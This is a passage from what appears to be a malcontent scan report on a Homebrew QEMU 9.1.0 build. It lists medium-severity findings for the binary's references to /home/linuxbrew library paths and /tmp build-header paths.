[touch slot number](https://github.com/search?q=touch+slot+number&type=code) | +| MEDIUM | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/bin](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fbin&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/etc/qemu-ifdown](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fetc%2Fqemu-ifdown&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/etc/qemu-ifup](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fetc%2Fqemu-ifup&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/etc/qemu/qemu.conf](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fetc%2Fqemu%2Fqemu.conf&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/libexec/qemu-bridge-helpe](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Flibexec%2Fqemu-bridge-helpe&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/share/icons](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fshare%2Ficons&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/share/locale](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fshare%2Flocale&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/share/qemu-firmware](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fshare%2Fqemu-firmware&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/var](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fvar&type=code)
[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code)
[/home/linuxbrew/.linuxbrew/opt/at-spi2-core/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fat-spi2-core%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/attr/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fattr%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/berkeley-db](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fberkeley-db&type=code)
[/home/linuxbrew/.linuxbrew/opt/binutils/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fbinutils%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/bzip2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fbzip2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/cairo/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fcairo%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/capstone/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fcapstone%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/dbus/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fdbus%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/dtc/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fdtc%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/elfutils/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Felfutils%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/expat/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fexpat%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/fontconfig/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ffontconfig%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/freeglut/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ffreeglut%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/freetype/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ffreetype%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/fribidi/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ffribidi%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gcc/lib/gcc/current](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgcc%2Flib%2Fgcc%2Fcurrent&type=code)
[/home/linuxbrew/.linuxbrew/opt/gdk-pixbuf/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgdk-pixbuf%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/glib/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fglib%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/glslang/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fglslang%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gmp/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgmp%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gnutls/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgnutls%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/graphite2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgraphite2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gsettings-desktop-schemas/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgsettings-desktop-schemas%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gtk](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgtk&type=code)
[/home/linuxbrew/.linuxbrew/opt/harfbuzz/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fharfbuzz%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/icu4c/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ficu4c%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/jpeg-turbo/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fjpeg-turbo%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/krb5/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fkrb5%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libcap-ng/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibcap-ng%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libcap/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibcap%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libdrm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibdrm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libedit/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibedit%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libepoxy/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibepoxy%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libevent/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibevent%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libffi/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibffi%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libfontenc/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibfontenc%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libice/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibice%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libidn2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibidn2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libnghttp2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibnghttp2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libnsl/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibnsl%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libpciaccess/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibpciaccess%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libslirp/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibslirp%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libsm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibsm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libssh/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibssh%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libtasn1/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibtasn1%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libtiff/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibtiff%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libtirpc/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibtirpc%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libunistring/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibunistring%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libusb/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibusb%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libva/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibva%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libvdpau/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibvdpau%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libx11/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibx11%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxau/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxau%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxcb/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxcb%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxcrypt/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxcrypt%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxcvt/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxcvt%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxdamage/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxdamage%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxdmcp/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxdmcp%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxext/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxext%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxfixes/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxfixes%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxfont2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxfont2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxi/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxi%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxinerama/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxinerama%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxkbcommon/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxkbcommon%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxkbfile/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxkbfile%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxml2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxml2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxmu/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxmu%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxrandr/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxrandr%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxrender/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxrender%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxshmfence/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxshmfence%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxt/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxt%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxtst/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxtst%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxv/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxv%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxxf86vm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxxf86vm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/llvm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fllvm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/lm-sensors/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flm-sensors%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/lz4/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flz4%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/lzo/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flzo%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/mesa-glu/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fmesa-glu%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/mesa/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fmesa%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/mpdecimal/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fmpdecimal%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/ncurses/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fncurses%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/nettle/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fnettle%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/openssl](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fopenssl&type=code)
[/home/linuxbrew/.linuxbrew/opt/p11-kit/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fp11-kit%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/pango/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fpango%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/pcre2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fpcre2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/pixman/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fpixman%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/python](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fpython&type=code)
[/home/linuxbrew/.linuxbrew/opt/readline/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Freadline%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/snappy/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fsnappy%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/spirv-llvm-translator/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fspirv-llvm-translator%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/spirv-tools/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fspirv-tools%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/sqlite/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fsqlite%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/systemd/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fsystemd%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/unbound/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Funbound%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/util-linux/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Futil-linux%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/valgrind/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fvalgrind%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/vde/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fvde%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/wayland/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fwayland%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xcb-util-image/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxcb-util-image%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xcb-util-keysyms/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxcb-util-keysyms%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xcb-util-renderutil/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxcb-util-renderutil%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xcb-util-wm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxcb-util-wm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xcb-util/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxcb-util%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xkbcomp/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxkbcomp%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xorg-server/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxorg-server%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xz/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxz%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/z3/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fz3%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/sbin/samba-dot-org-smbd](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fsbin%2Fsamba-dot-org-smbd&type=code) | +| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/perf-%d.map](https://github.com/search?q=%2Ftmp%2Fperf-%25d.map&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/block/block-gen.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Fblock%2Fblock-gen.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/hw/usb/hcd-ehci.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Fhw%2Fusb%2Fhcd-ehci.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/authz/base.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fauthz%2Fbase.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/authz/list.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fauthz%2Flist.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/authz/listfile.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fauthz%2Flistfile.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/authz/simple.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fauthz%2Fsimple.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/block/throttle-gro](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fblock%2Fthrottle-gro&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/chardev/char-fd.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fchardev%2Fchar-fd.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/chardev/char-socke](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fchardev%2Fchar-socke&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/chardev/char.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fchardev%2Fchar.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/secret.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Fsecret.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/secret_comm](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Fsecret_comm&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/secret_keyr](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Fsecret_keyr&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/tls-cipher-](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Ftls-cipher-&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/tlscreds.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Ftlscreds.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/tlscredsano](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Ftlscredsano&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/tlscredspsk](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Ftlscredspsk&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/tlscredsx50](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Ftlscredsx50&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/exec/memory.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fexec%2Fmemory.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/exec/memory_ldst_c](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fexec%2Fmemory_ldst_c&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/exec/ram_addr.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fexec%2Fram_addr.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/acpi/acpi_aml_i](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Facpi%2Facpi_aml_i&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/acpi/acpi_dev_i](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Facpi%2Facpi_dev_i&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/acpi/vmgenid.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Facpi%2Fvmgenid.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/block/flash.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fblock%2Fflash.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/boards.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fboards.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/char/serial.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fchar%2Fserial.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/clock.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fclock.h&type=code)
